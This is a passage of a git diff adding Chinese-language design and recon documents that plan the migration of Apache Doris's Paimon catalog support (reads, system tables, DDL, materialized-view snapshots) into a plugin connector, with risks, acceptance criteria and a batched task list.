分区内省。**greenfield**,paimon 首个 | +| E8 Statistics | 🟡 partial | 仅表级 `getTableStatistics` 默认空;无列级 | +| E9 Identifier | ✅ | `ConnectorIdentifierOps`,identity 默认,低风险 | +| **E10 MTMV** | ❌ **absent(blocker)** | fe-connector 树 **零 MTMV 符号**;`PluginDrivenExternalTable.java:62` 实现无 MTMV 接口(firsthand);legacy `PaimonExternalTable.java:74` 实现全套。须**新增**(详见 §3.5 + §4)| + +--- + +## 3. 五大功能区 fe-core 现状(code-grounded) + +### 3.1 普通表读取 + +- **入口/分发**:`BindRelation`(`:467/539` PAIMON_EXTERNAL_TABLE → LogicalFileScan + `loadSnapshots`→`PaimonExternalTable.loadSnapshot`)→ `PhysicalPlanTranslator:781`(reverse-instanceof `PAIMON_EXTERNAL_TABLE` → new `PaimonScanNode`,并传 tableSnapshot/scanParams `:793-797`)。 +- **核心类**:`PaimonScanNode`(`source/PaimonScanNode.java:78` extends `FileQueryScanNode`)—— split 生成(`getSplits:360`:DataSplit→native RawFiles / JNI 全序列化 Split / COUNT 合并行数)、谓词转换(`convertPredicate:189`)、per-split thrift(`setPaimonParams:253`)、`getPaimonSplitFromAPI:581`(真 SDK 调 `ReadBuilder.plan().splits()`)、`validateIncrementalReadParams:701`、`getProcessedTable:880`(增量读 `copy(incrReadParams)`)。`PaimonSource`(`source/PaimonSource.java:37`)解析 `org.apache.paimon.table.Table`(reverse-instanceof PaimonExternalTable/PaimonSysExternalTable)。 +- **BE 交互**:JNI(`be-java-extensions/paimon-scanner` + BE C++ `paimon_jni_reader.cpp` **及** native `paimon_cpp_reader.cpp`/`paimon_predicate_converter.cpp`)。`serialized_table`/`paimon_split`/`paimon_predicate` 经 `PaimonUtil.encodeObjectToString`(InstantiationUtil + **URL-safe** Base64)。 +- **缓存**:`PaimonExternalMetaCache` + `metacache/paimon/{PaimonTableLoader,PaimonLatestSnapshotProjectionLoader,PaimonPartitionInfoLoader}`。 +- **⚠️ 序列化格式 Base64 之争(已证伪为非 blocker)**:连接器用 **standard** Base64(`PaimonScanPlanProvider.java:384`)vs fe-core URL-safe(`PaimonUtil.java:519`);但 BE `PaimonUtils.deserialize` **先试 URL_DECODER 再 fallback STD_DECODER**(`PaimonUtils.java:42-47`)→ 两种都能反序列化。降级为「须 round-trip smoke 验 + pin paimon-core 版本」(InstantiationUtil 跨版本敏感)。 + +### 3.2 系统表读取 + +- **两层**:通用 `datasource/systable/`(`SysTable` 名解析末-`$` 切分 `:92-101`、`SysTableResolver:54` 分发 `NativeSysTable && ExternalTable`、`PaimonSysTable:45` extends `NativeSysTable`,`SUPPORTED_SYS_TABLES` 取自 SDK `SystemTableLoader.SYSTEM_TABLES:51`)**+** paimon 专有 `PaimonSysExternalTable`(`:65` extends ExternalTable,报 `PAIMON_EXTERNAL_TABLE:88`,`getSysPaimonTable` 走 **4-arg** `Identifier(db,tbl,"main",sysName):118`,`toThrift` 发 `HIVE_TABLE:180`,`fetchRowCount` plan splits `:200`)。 +- **读路径**:`PaimonScanNode` 多处 sys 分支——非 DataSplit 强制 JNI、`shouldForceJniForSystemTable`(binlog/audit_log,`:523-536`)、`getProcessedTable` 拒 scan-params/time-travel(`:883-890`)。 +- **关键迁移约束**:迁后 sys wrapper **必须 extends `PluginDrivenExternalTable`(报 PLUGIN_EXTERNAL_TABLE)** 才能走 `PluginDrivenScanNode`;若照抄报 `PAIMON_EXTERNAL_TABLE` → 路由到**即将删除**的 legacy `PaimonScanNode`(routing blocker)。binlog/audit_log 是 **DataTable** 却须强制 JNI → 须按 **sysName** 而非 split 类型判定。 + +### 3.3 procedure + +- **零可迁**(firsthand)。`CALL` → `CallFunc.getFunc` 闭式 2-case(EXECUTE_STMT/FLUSH_AUDIT_LOG),default throw(`CallFunc.java:43`)。`ALTER ... EXECUTE` → `ExecuteActionFactory.createAction:50` reverse-instanceof,仅 `IcebergExternalTable` 分支,其余 throw(`:61`)。`ExecuteActionFactory` import fe-core 具体类(连接器禁 import),故未来 paimon procedure 须**新 SPI seam**。 +- **两个假阳性**(须 doc 钉死防后人误挖):① `CALL paimon.sys.migrate_table`(`test_hive_migrate_paimon.groovy:84-93`)= **Spark** 容器命令非 Doris;② `expire_snapshots` = **iceberg** action(`IcebergExpireSnapshotsAction`)非 paimon。 + +### 3.4 DDL(create/drop table & db + 6 flavor) + +- **flavor 装配(hard part)**:`PaimonExternalCatalogFactory:29-47`(验 flavor、恒返 base catalog);`AbstractPaimonProperties:37`(warehouse/options/ExecutionAuthenticator/S3 normalize)+ 5 子类 `Paimon{HMS,AliyunDLF,Rest,FileSystem,Jdbc}MetaStoreProperties` + `PaimonPropertiesFactory:22`(按 `paimon.catalog.type` 注册 dlf/filesystem/hms/rest/jdbc)。全 import fe-core `StorageProperties`/`HMSBaseProperties`/`HadoopExecutionAuthenticator`(**禁 import**)。**每-flavor authenticator**(HMS/HDFS-FS/JDBC=Hadoop doAs;DLF/Rest=no-op)包裹 createCatalog+每次 DDL——丢即 Kerberized DDL 炸(无离线测覆盖)。REST 忽略 storage(`Rest.java:78`)、DLF 强制 OSS(`DLF.java:90`)、JDBC 动态 DriverShim/URLClassLoader——非对称须复刻。 +- **metadata-ops**:`PaimonMetadataOps:64-405`(createDb HMS-only-props gate `:103`、dropDb force enumerate-loop `:147`、createTable 双存在检查 + `toPaimonSchema:231`、`DorisToPaimonTypeVisitor:48`)。**ALTER 全 throw UnsupportedOperation(`:309-333`)= 本就不支持,out of scope**。 +- **latent bug 须保留不修**:performCreateTable 用 remote 名查存在但 LOCAL 名建 Identifier(`Ops.java:190` vs `:223`)。 +- **翻闸 fe-core 编辑点**:SPI_READY_TYPES 加 paimon(`CatalogFactory.java:52`)+删 built-in case(`:142`);`CreateTableInfo.pluginCatalogTypeToEngine` 加 `case paimon→ENGINE_PAIMON`(`:937-944`,否则 no-ENGINE CREATE TABLE + engine 一致性断,instanceof PaimonExternalCatalog `:388/915` 翻闸后失火);GSON 7 注册齐迁。 + +### 3.5 mtmv + +- legacy `PaimonExternalTable.java:74` implements `MTMVRelatedTableIf`+`MTMVBaseTableIf`+`MvccTable`,方法:`loadSnapshot:308`(→`PaimonMvccSnapshot`)、`getTableSnapshot:271/284`(→`MTMVSnapshotIdSnapshot(snapshotId)`)、`getPartitionSnapshot:259`(→`MTMVTimestampSnapshot(lastFileCreationTime)`)、`getAndCopyPartitionItems:228`、`getPartitionType:233`(LIST/UNPARTITIONED)、`getPartitionColumnNames:241`、`isPartitionInvalid:254`、`isPartitionColumnAllowNull:298`(恒 true)、`beforeMTMVRefresh:223`(no-op)、`getNewestUpdateVersionOrTime:290`(**故意绕过 pin**)。 +- **单-pin 不变式**:`loadSnapshot` 一次 pin `PaimonSnapshotCacheValue`(snapshotId+分区集+Table handle),全 MTMV/schema 方法经 `getOrFetchSnapshotCacheValue:383` 复用同 pin。`StatementContext.loadSnapshots:987` 按 `MvccTableInfo` 存不透明 `MvccSnapshot`。 +- **SPI 拆分难点**:`ConnectorMvccSnapshot`(final)只能载 snapshotId/timestamp,**载不动**分区 map + Table handle → 富 pin 须留 fe-core 侧。MTMV 类型(`PartitionItem`/`PartitionType`/`Column`/`MTMVSnapshotIf` 及其 GSON 子类)**无 SPI 等价物** → MTMV 必须留在 fe-core。 +- **好消息**:表级 staleness=snapshotId 正好映 `ConnectorMvccSnapshot.getSnapshotId():51`(long,-1 哨兵对齐 `PaimonSnapshot.java:23`);分区级 staleness=`ConnectorPartitionInfo.getLastModifiedMillis():90`(**已存在**,firsthand 核实,6-arg ctor `:53`);分区枚举→PartitionItem 由 `PluginDrivenExternalTable.getNameToPartitionItems:246`(基类已做,复用即删 fe-core 重复 `PaimonUtil.generatePartitionInfo`)。 +- **新风险 GAP-LISTPART-AT-SNAPSHOT**:`listPartitions` 与 snapshot 方法解耦——无法「按 pin 的 snapshotId 列分区」。若 `beginQuerySnapshot` pin 了 snapshotId 但 `listPartitions(latest)` 看到更新 snapshot → 刷新 staleness keying 错位(**最高 correctness 风险,静默**)。 + +--- + +## 4. 跨切面(翻闸风险,对抗复审已核) + +| 关注 | 结论 / 行动 | +|---|---| +| **MTMV 无 SPI(E10)** | 翻闸**不**机械阻断(plain SELECT 经 `getPaimonTable(empty)` 取 latest 仍工作),但**静默回归**已有 paimon-MTMV-base + 时间旅行 pin。修法 = fe-core 新建 `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` 实现三接口(拉 SPI-neutral 数据:snapshotId via E5、lastModifiedMillis via ConnectorPartitionInfo)。**翻闸前必须落地此桥 OR 显式 fail-loud + 文档化「暂不支持」**——禁静默读 latest。GSON table 子类须注册此 MTMV-capable 子类(非裸 PluginDrivenExternalTable)。| +| **GSON 7 注册原子齐迁** | 5 catalog 名 + db + table 全转 `registerCompatibleSubtype`→PluginDriven*;漏任一(尤其 db)→ replay `ClassCastException`。须加每个 flavor catalog 名的 replay 测。| +| **FE 分发缺口(部分已预接)** | **更正先验**:DROP TABLE/CREATE·DROP DB/CREATE TABLE 已在 `PluginDrivenExternalCatalog`(createTable:267/createDb:336/dropDb:377/dropTable:406) 通用 override;SHOW PARTITIONS(`ShowPartitionsCommand:206`)+partitions TVF(`MetadataGenerator:1349`) 已对 PLUGIN_EXTERNAL_TABLE 预接。**残留缺口 = 连接器侧 `listPartitions*` 未实现** + 确认 `isPartitionedTable`/`getPartitionColumns` 透出 paimon 分区列。| +| **classloader R-004** | `ConnectorPluginManager.java:62-63` parent-first → paimon SDK 单一共享实例(`SystemTableLoader` 静态、JDBC DriverManager 全局)。多 catalog 不同 flavor/版本共存依赖 SDK 容忍度(**开放,源码不可验**)。| +| **FE/BE 共享 jar R-007** | BE paimon-scanner **冻结不动**;序列化身份是契约。须 **pin 连接器 paimon-core == be-java-extensions/paimon-scanner + preload-extensions 的版本**(InstantiationUtil 跨版本静默破)。Base64 之争已证伪(§3.1)。删 legacy 后须验 paimon-core 在 FE classpath 恰一份([[catalog-spi-be-java-ext-shared-classpath]] FE 类比)。| +| **snapshotId 类型 R-012** | `long` 端到端正确,-1 哨兵。连接器须返 `ConnectorMvccSnapshot(snapshotId=-1)` 而非 `Optional.empty()` 表示空表。| +| **session-TZ 谓词 bug** | 连接器 `PaimonPredicateConverter:284` 固定 UTC → 非 UTC session 时间戳谓词误推丢行。翻闸前修:读 `ConnectorSession.getTimeZone()` 惰性解析+降级(镜像 `MaxComputePredicateConverter:302`)。| + +--- + +## 5. maxcompute 一致性约定(连接器须遵循,from full-adopter 样板) + +> MC = 完整 full-adopter 范本,但 **sys-table/procedure/MVCC/MTMV/vended 全无**(fe-core datasource/maxcompute 已 0 文件)。paimon 在这四块**无 MC 先例**,须自定义 minimal default-no-op SPI。可镜像的是结构约定: + +1. **仅依赖** fe-connector-api/spi + 数据源 SDK + `org.apache.doris.thrift.*`;**禁** import fe-core/fe-common/fe-catalog → 常量/工具**拷入**模块(MC 拷 MCProperties→MCConnectorProperties、MCUtils→MCConnectorClientFactory)。 +2. fe-core 可调项经 `ConnectorSession.getSessionProperties()/getTimeZone()` **逐字节字符串键**读,带 legacy 默认 fallback;键须对齐 `ConnectorSessionBuilder` 注入。 +3. Provider getType 字符串 == SPI_READY_TYPES 项 == ScanRange.getTableFormatType(单一真源);META-INF/services 注册。 +4. Handle/ColumnHandle = 不透明 Serializable 值(重 SDK 对象 transient + **反序列化 reload**);ScanRange Serializable,getTableFormatType 选 BE thrift 分支。 +5. BE thrift 全在连接器内建(populateRangeParams/buildTableDescriptor/sink),类型打标,**禁返 null**(BE static_cast)。 +6. `validateProperties` 在 CREATE CATALOG fail-fast 抛 `IllegalArgumentException`。 +7. 谓词 **exact-or-dropped**:不可转 → 降级 NO_PREDICATE(BE 复算);`supportsCastPredicatePushdown()=false` 除非 CAST 语义等同。 +8. 重远端 client/settings **建一次共享** scan+write(lazy double-checked)。 +9. 远端 SDK 调用经接口抽出(如 `McStructureHelper`)+ ctor 可注入 → 离线 recording-fake 单测(**无 mockito / 无 fe-core**);live 测 JUnit Assumptions 守 env。 +10. DDL:连接器做远端,`PluginDrivenExternalCatalog` override 做 edit-log+cache invalidation;显式 honor IF NOT EXISTS/FORCE,fail-loud 不静默。 +11. 翻闸 GSON 三注册(catalog+db+table)原子齐迁 + SPI_READY_TYPES 加类型。 + +**paimon 须 diverge 处(合理)**:① MTMV/MvccTable 经 fe-core 子类(非加到通用基类,保 MC/jdbc/es/trino 干净);② 首个真 E5 消费者须 override beginQuerySnapshot 三方法 + 声明 SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL;③ 首个 E7 消费者须定义 sys-table SPI hook(default-empty)。 + +--- + +## 6. 测试基线 + +- 连接器 `fe-connector-paimon`:**0 测试**(须建测试模块 + 注入式 SDK seam)。 +- 旧框架 / sys-table / MTMV-over-paimon / 时间旅行 / deletion-vector native / 元数据 sys-table JNI 读:**recon 未定位到任何回归/e2e baseline** → 翻闸回归不可检,须 B0/B9 自建 before/after parity + FE→BE round-trip smoke。 + +--- + +## 7. 沿用坑(来自 HANDOFF / auto-memory) + +- maven 绝对 `-f .../fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`;改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 +- 连接器禁 import fe-core(import-gate `tools/check-connector-imports.sh`);session 值经 session-property 透传([[catalog-spi-connector-session-tz-gotcha]])。 +- 连接器测试模块无 mockito(纯 seam / child-first loader,[[catalog-spi-fe-core-test-infra]]);checkstyle 含 test 源、test 阶段不跑(单独 `checkstyle:check`)。 +- 删多模块 dep 须核传递依赖([[catalog-spi-be-java-ext-shared-classpath]]:P4 删 odps 蒸发 BE commons-lang);删 legacy 后验 paimon-core FE classpath 恰一份。 +- clean-room 对抗复审偏好([[clean-room-adversarial-review-pref]]);本 recon 已用(14 agent + cross-cut critic 证伪了 Base64-blocker / FE-dispatch-全缺 / 6-flavor-工厂-已建 三个先验)。 diff --git a/plan-doc/tasks/P5-paimon-migration.md b/plan-doc/tasks/P5-paimon-migration.md new file mode 100644 index 00000000000000..15074f4edb9c61 --- /dev/null +++ b/plan-doc/tasks/P5-paimon-migration.md @@ -0,0 +1,209 @@ +# P5 — paimon 迁移(full adopter + 翻闸;复用 P4 写/事务 + cutover 样板) + +> 设计 doc。事实底座见 `research/p5-paimon-migration-recon.md`(14-agent code-grounded recon + cross-cut 对抗复审)。 +> 本 doc 含:old→new 映射、批次计划、有序 TODO、**开放决策(待用户签字)**。维护规则见 [README §4](../README.md)。 + +--- + +## 元信息 + +- **状态**:⏸ 待启动(recon+设计完成;**D1/D2 已签字 2026-06-09**,可启动分批实现) +- **启动日期**:2026-06-09(recon+设计) +- **目标完成**:TBD(估时 ~5-6 周,含 D2-A 的 MTMV/MVCC 桥) +- **阻塞**:无(D1=A / D2=A 已签字);分批实现按 B0→B9 启动 +- **阻塞下游**:P5 是最后一个 lakehouse full-adopter 样板验证(E5/E6/E7/E10 首次落地);其 SPI 新面(E7 sys-table hook、E10 MTMV 桥、E5 wiring)将被未来 iceberg/hudi 翻闸复用——设计错须二次迁移 +- **主 owner**:@morningman / TBD + +--- + +## 阶段目标 + +把 fe-core `datasource/paimon/`(28 文件)+ `metacache/paimon/`(3) + `property/metastore/*Paimon*`(7) + 反向引用迁入 `fe-connector-paimon`,按 maxcompute full-adopter 样板翻闸(paimon 进 `SPI_READY_TYPES`)并删 legacy。覆盖用户指定 5 功能区: + +1. **普通表读取** — 补完已有 scan 骨架 + 翻闸(最接近 MC 样板)。 +2. **系统表读取** — 新建 E7 sys-table SPI hook + 通用 `PluginDrivenSysExternalTable`(greenfield,首个消费者)。 +3. **procedure** — **零可迁,doc-only no-op**(fe-core 无 paimon procedure;现即拒)。 +4. **DDL** — 迁 `PaimonMetadataOps` + 6 flavor 装配 + 翻闸编辑点。 +5. **mtmv** — fe-core 新建 `PaimonPluginDrivenExternalTable` 桥(E10 无 SPI 面 + 首个 E5 消费者)。 + +Master plan [§3.6](../00-connector-migration-master-plan.md);策略 = full adopter + 翻闸(复用 P4 写/事务 SPI + cutover 流程)。 + +--- + +## 关键事实(本设计 session code-grounded 核读,2026-06-09) + +- paimon **不在** `SPI_READY_TYPES`(`CatalogFactory.java:52` = {jdbc,es,trino-connector,max_compute}),仍走 built-in case(`:142`)。firsthand 核实。 +- GSON **7 处** paimon 注册(5 catalog `GsonUtils.java:390-396` + db `:450` + table `:471`,全 `registerSubtype`)。firsthand 核实。 +- `PluginDrivenExternalTable`(`:62`)**不** implements MTMV/Mvcc 任何接口;有 `getPartitionColumns:218` + `getNameToPartitionItems:246`。firsthand 核实。 +- `ConnectorPartitionInfo.getLastModifiedMillis()`(`:90`,6-arg ctor `:53`)**已存在** → 分区级 MTMV staleness 载体现成。firsthand 核实。 +- 5 个 `fe-connector-paimon-backend-*` 模块 = **空壳**(仅 gitignore `.flattened-pom.xml`,零 src)。连接器现走单 Catalog(`PaimonConnector.java:75-83` stub)。 +- 连接器 `PaimonConnectorMetadata` 已实现 read 7 方法;DDL/partition/MVCC/sys-table 全落 SPI 默认。**0 测试**。 +- procedure 区 fe-core 零 paimon 实现;`expire_snapshots`=iceberg、`CALL paimon.sys.migrate_table`=Spark(两假阳性)。 + +--- + +## old → new 映射(按功能区,详见 recon §3) + +| 功能区 | fe-core 旧 | 新归宿 | SPI 点 | 动作 | +|---|---|---|---|---| +| 普通读 | `PaimonScanNode`/`PaimonSource`/`PaimonSplit` | `PaimonScanPlanProvider`+`PaimonScanRange`+通用 `PluginDrivenScanNode` | E3 | migrate+删 legacy | +| 普通读 | `source/PaimonPredicateConverter`+`PaimonValueConverter`(重复)| 连接器 `PaimonPredicateConverter`(修 session-TZ)| E3 pushdown | delete-duplicate | +| 普通读 | `PaimonExternalMetaCache`+`metacache/paimon/*`(3) | 连接器内 cache | 无 SPI(连接器内)| new+删 legacy | +| 普通读 | `PaimonScanMetricsReporter`/`PaimonMetricRegistry` | 无(连接器禁 import profile)| 无 | **drop**(MC 无先例,登记 profile 回归)| +| sys-table | `PaimonSysTable`+`PaimonSysExternalTable` | 通用 `PluginDrivenSysExternalTable`(报 PLUGIN_EXTERNAL_TABLE)+连接器 E7 impl | **E7(新)** | migrate+delete-duplicate | +| sys-table | `SysTable`/`SysTableResolver`(通用名解析)| 留 fe-core 通用 + 扩 findSysTable 委托 | 通用 bridge | keep-generic | +| procedure | (无)| (无)| E2 absent | **no-op doc** | +| DDL | `PaimonMetadataOps` | `PaimonConnectorMetadata` DDL 方法(连接器远端 + `PluginDrivenExternalCatalog` override edit-log)| E1+ConnectorSchemaOps | migrate | +| DDL | `AbstractPaimonProperties`+5 flavor+`PaimonPropertiesFactory` | `PaimonConnector.createCatalog` flavor switch(+每-flavor authenticator)| 连接器内 | migrate(见 D1)| +| DDL | `DorisToPaimonTypeVisitor` | `PaimonTypeMapping` 反向(吃 ConnectorType)| E1 | migrate(保留 legacy gap)| +| DDL | 5 catalog+factory+db+table(GSON 壳)| `PluginDrivenExternalCatalog/Database/Table`(+MTMV 子类)| GSON compat | keep-generic+原子齐迁 | +| mtmv | `PaimonExternalTable`(MTMVRelated/Base/Mvcc) | fe-core 新 `PaimonPluginDrivenExternalTable` 桥 | **E10(新)+E5** | new | +| mtmv | `PaimonMvccSnapshot`/`PaimonSnapshot`/`PaimonPartitionInfo` | fe-core MvccSnapshot 包 `ConnectorMvccSnapshot`+分区 map;snapshotId via E5 | E5 | migrate(拆解)| + +--- + +## 验收标准 + +- [ ] paimon ∈ `SPI_READY_TYPES`;built-in case 删;`CreateTableInfo.pluginCatalogTypeToEngine` 加 `paimon→ENGINE_PAIMON`;GSON 7 注册原子转 compat。 +- [ ] 普通表读取 parity(谓词下推行正确性、分区裁剪行数、native ORC/Parquet vs JNI、deletion-vector、SELECT * 无谓词)vs 旧 `PaimonScanNode`,before/after 回归绿。 +- [ ] 系统表 `$snapshots/$files/$partitions/$manifests/$schemas/$binlog/$audit_log` SELECT + DESCRIBE 经 SPI 路径正确(binlog/audit_log 强制 JNI 行正确)。 +- [ ] DDL:CREATE/DROP TABLE(分区+主键+location)、CREATE/DROP DATABASE(HMS 带 props vs filesystem 拒)、DROP DB FORCE 级联、no-ENGINE CREATE TABLE、重启后 5 flavor GSON tag edit-log replay 绿。 +- [ ] **MTMV**(D2 取「实现」时):单分区变更只刷该分区(timestamp staleness)+ 全表 snapshotId 变更刷全表;单-pin 不变式测(读路径与 MTMV 各方法观同一 snapshotId+分区集)。**OR**(D2 取「fail-loud 延后」时):MTMV-base/时间旅行命中 SPI paimon 表显式报错,**禁静默读 latest**。 +- [ ] procedure:`CALL paimon.x` / `ALTER ... EXECUTE` 翻闸后仍报错(no-op 守护);doc 钉死两假阳性。 +- [ ] session-TZ 时间戳谓词非 UTC session 不丢行(修 `PaimonPredicateConverter:284`)。 +- [ ] FE→BE serialized-Table round-trip smoke(built jars);连接器 paimon-core 版本 == be-java-extensions/paimon-scanner + preload-extensions。 +- [ ] 连接器 UT(无 mockito/无 fe-core)+ checkstyle 0 + import-gate 净;删 legacy 后 `grep paimon fe-core/src` 仅 GSON compat 壳。 +- [ ] live e2e(真实 paimon 各 flavor 环境,用户跑,硬门)。 + +--- + +## 任务清单 + +> ID 永不复用。批次依赖见下节。type:C=code / T=test / D=doc。 + +| ID | 任务 | 批次 | type | 状态 | 备注 | +|---|---|---|---|---|---| +| P5-T01 | 建 `fe-connector-paimon` 测试模块 + 注入式 SDK seam(`PaimonCatalogOps` 接口包远端 Catalog 调用,MC `McStructureHelper` 范式,no-mockito recording fake)| B0 | C+T | ⏳ | 0 测试现状 | +| P5-T02 | parity baseline(vs 旧 `PaimonScanNode`:谓词/分区/native·JNI/deletion/SELECT*)+ FE→BE round-trip smoke + **pin paimon-core 版本三方对齐** | B0 | T | ⏳ | 翻闸前后跑 | +| P5-T03 | `PaimonConnector.createCatalog` flavor 装配(switch on `paimon.catalog.type`:warehouse/options/重建 Hadoop·HiveConf/**每-flavor ExecutionAuthenticator**;filesystem→hms→rest/jdbc/dlf 渐进)| B1 | C | ⏳ | **gated on D1**;authenticator 丢=Kerberos DDL 炸 | +| P5-T04 | 拷 HMS/REST/DLF/JDBC + credential/storage 属性键入 `PaimonConnectorProperties`(禁 import fe-core)| B1 | C | ⏳ | | +| P5-T05 | 扩 `PaimonConnectorProvider.validateProperties`(flavor 合法性 + 每-flavor 必需属性,`IllegalArgumentException` fail-fast)| B1 | C | ⏳ | legacy `PaimonExternalCatalogFactory:29-47` | +| P5-T06 | 修 `PaimonTableHandle` transient-Table **reload fallback**(transient null 时由 `catalog.getTable(Identifier)` 重建);`PaimonScanPlanProvider:95` 调用 | B2 | C | ⏳ | **BLOCKER** | +| P5-T07 | `PaimonPredicateConverter` session-TZ 化(读 `getTimeZone()` 惰性解析+降级,替 `:284` 固定 UTC);不可转降级空;`supportsCastPredicatePushdown()=false`;保 FLOAT/CHAR 不下推 | B2 | C | ⏳ | [[catalog-spi-connector-session-tz-gotcha]] | +| P5-T08 | 实现 `PaimonConnectorMetadata.listPartitionNames/listPartitions/listPartitionValues`(填 `ConnectorPartitionInfo` 含 lastModifiedMillis=`Partition.lastFileCreationTime()`,partitionName=最终 legacy-name 解析后显示名)+ `getProperties`(现 stub `:154`)| B2 | C | ⏳ | 喂 `getNameToPartitionItems:246` 裁剪 + MTMV | +| P5-T09 | override 6-arg `planScan(...requiredPartitions)` 让引擎分区裁剪生效(`PluginDrivenScanNode:474`),OR 文档化纯谓词裁剪 + 测 | B2 | C | ⏳ | 现只 override 4-arg | +| P5-T10 | 连接器内 cache 已解析 Table+schema(替 `PaimonExternalMetaCache`);核 REFRESH CATALOG 经 `PluginDrivenExternalCatalog` 销毁 connector(`:530-534`)是否够,否则提 `invalidateTable` SPI;核 REFRESH TABLE seam | B2 | C | ⏳ | 见开放问题 | +| P5-T11 | `PaimonTypeMapping` 加 Doris→paimon 方向(吃 ConnectorType;保留 legacy gap:无 TINYINT/SMALLINT/LARGEINT/TIME、char→VarChar(MAX)、DATETIME→plain Timestamp)| B3 | C | ⏳ | `DorisToPaimonTypeVisitor:81-108` | +| P5-T12 | `PaimonSchemaBuilder`(ConnectorCreateTableRequest→paimon Schema:primary-key/comment/location→CoreOptions.PATH、partitionKeys from IDENTITY spec;bucket 经 options passthrough)| B3 | C | ⏳ | DISTRIBUTE BY 禁(`CreateTableInfo:793`) | +| P5-T13 | 实现 `createTable`/`dropTable`(远端 + per-flavor authenticator;保留 latent remote-vs-local 名 bug 不修)| B3 | C | ⏳ | `PluginDrivenExternalCatalog` 已 override FE 侧 | +| P5-T14 | 实现 `supportsCreateDatabase=true`+`createDatabase`(HMS-only-props gate 读 `session.getCatalogProperties()`)+`dropDatabase(force)` enumerate-loop | B3 | C | ⏳ | MC parity `:466/478` | +| P5-T15 | DDL 离线 UT(createDb gate / dropDb force 级联 / createTable schema / IF NOT EXISTS / type gap)| B3 | T | ⏳ | | +| P5-T16 | **新 E7 SPI**:`ConnectorMetadata.listSupportedSysTables`(default emptySet) + `getSysTableHandle`(default empty);保 MC/jdbc/es/trino 不受影响 | B4 | C | ⏳ | greenfield,签名须慎(被未来连接器复用)| +| P5-T17 | paimon 实现 E7:名取 `SystemTableLoader.SYSTEM_TABLES`;`getSysTableHandle` 走 4-arg `Identifier(db,tbl,"main",sysName)`;handle 带 sysName+forceJni;reload fallback | B4 | C | ⏳ | branch="main" 限制保留+文档 | +| P5-T18 | 通用 fe-core `PluginDrivenSysExternalTable extends PluginDrivenExternalTable`(报 PLUGIN_EXTERNAL_TABLE) + `NativeSysTable` factory;override `PluginDrivenExternalTable.getSupportedSysTables/findSysTable` 委托连接器 | B4 | C | ⏳ | 路由经 `PluginDrivenScanNode`,**勿报 PAIMON_EXTERNAL_TABLE** | +| P5-T19 | `PaimonScanPlanProvider` 加 forceJni 分支(binlog/audit_log + 非 DataTable sys 全走 JNI)+ 通用节点 fail-loud 拒 sys 表 scan-params/time-travel;核 BE sys-table `TTableDescriptor`(HIVE_TABLE?) | B4 | C | ⏳ | binlog/audit_log 走 native = 行错(静默)| +| P5-T20 | **首个 E5 消费者**:实现 `beginQuerySnapshot/getSnapshotAt/getSnapshotById`(返 `ConnectorMvccSnapshot(snapshotId)`,空表 -1)+声明 `SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL`;sys 表不得透出 time-travel | B4 | C | ⏳ | | +| P5-T21 | **GAP-LISTPART-AT-SNAPSHOT**:listPartitions 加 at-snapshot 重载(按 pin 的 snapshotId 列分区);连接器实现;默认保 latest 向后兼容 | B5 | C | ⏳ | 单-pin 不变式前提 | +| P5-T22 | fe-core `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` implements MTMVRelatedTableIf+MTMVBaseTableIf+MvccTable;`loadSnapshot`(beginQuerySnapshot 定 snapshotId + at-snapshot 物化分区集**一次**)| B5 | C | ⏳ | **gated on D2** | +| P5-T23 | 子类 MTMV 方法:getTableSnapshot(→MTMVSnapshotIdSnapshot,-1)/getPartitionSnapshot(→MTMVTimestampSnapshot,缺抛 AnalysisException)/getAndCopyPartitionItems(读 pin 非重列)/getPartitionType/getPartitionColumnNames/isPartitionColumnAllowNull(true)/beforeMTMVRefresh(no-op)/getNewestUpdateVersionOrTime(**绕 pin**) | B5 | C | ⏳ | | +| P5-T24 | rehome fe-core `PaimonMvccSnapshot`(包 `ConnectorMvccSnapshot` + fe-core 物化 name→PartitionItem/lastModifiedMillis/listed-count);downcast 留 fe-core 内 | B5 | C | ⏳ | | +| P5-T25 | isPartitionInvalid parity(捕 listPartitions count vs 成功构建 PartitionItem count,size 不匹配→UNPARTITIONED 全表刷);MTMV 单-pin 不变式测 + UT | B5 | C+T | ⏳ | | +| P5-T26 | **procedure DOC no-op**:连接器档 E2 改「NOTHING TO PORT」(非「后续」);钉死两假阳性(Spark migrate_table / iceberg expire_snapshots);记未来 seam 位置(`ExecuteActionFactory:59` + 可选 `ConnectorProcedureProvider`);可选负回归(CALL/EXECUTE 仍报错)| B6 | D | ⏳ | 零 code | +| P5-T27 | **翻闸**:paimon 入 `SPI_READY_TYPES:52` + 删 built-in case `:142` + `pluginCatalogTypeToEngine` 加 `paimon→ENGINE_PAIMON`(`:937-944`)+ 删 `PhysicalPlanTranslator` PAIMON 分支(`:781`)+import(`:71`)| B7 | C | ⏳ | gated on B2-B5 | +| P5-T28 | **翻闸 GSON 原子**:5 catalog 名 + db + table 全转 `registerCompatibleSubtype`→PluginDriven*(table→`PaimonPluginDrivenExternalTable` 非裸 base);加 5 flavor tag replay 测 | B7 | C+T | ⏳ | 漏 db→ClassCastException | +| P5-T29 | **删 legacy**:`datasource/paimon/`(28) + `metacache/paimon/`(3) + 反向引用;确认零引用;验 paimon-core FE classpath 恰一份(R-004/R-007 NoClassDefFound 守)| B8 | C | ⏳ | gated on 翻闸 live 验 | +| P5-T30 | post-cutover 回归:SHOW PARTITIONS + partitions TVF(预接 FE 分发现返行)/DROP·CREATE DB·TABLE/no-ENGINE CREATE/edit-log replay/MTMV 增量刷/sys-table/session-TZ 谓词不丢行 | B9 | T | ⏳ | | + +--- + +## 批次依赖 / 翻闸前置门 + +``` +B0 (test harness + parity baseline) ──┐ + ├─> B1 (flavors+props+catalog) ──┬─> B2 (normal-read) ──┐ + │ └─> B3 (DDL metadata) ─┤ +B6 (procedure doc no-op, 独立) │ ├─> B4 (sys-tables E7 + MVCC E5) ─> B5 (MTMV 桥) + │ │ + └────────────────────────────────────────────────────> B7 (cutover 原子) ─> B8 (删 legacy) ─> B9 (回归) +``` +- **B7 翻闸 gated on B2+B3+B4+B5 全完**(否则 MTMV/MVCC/sys-table 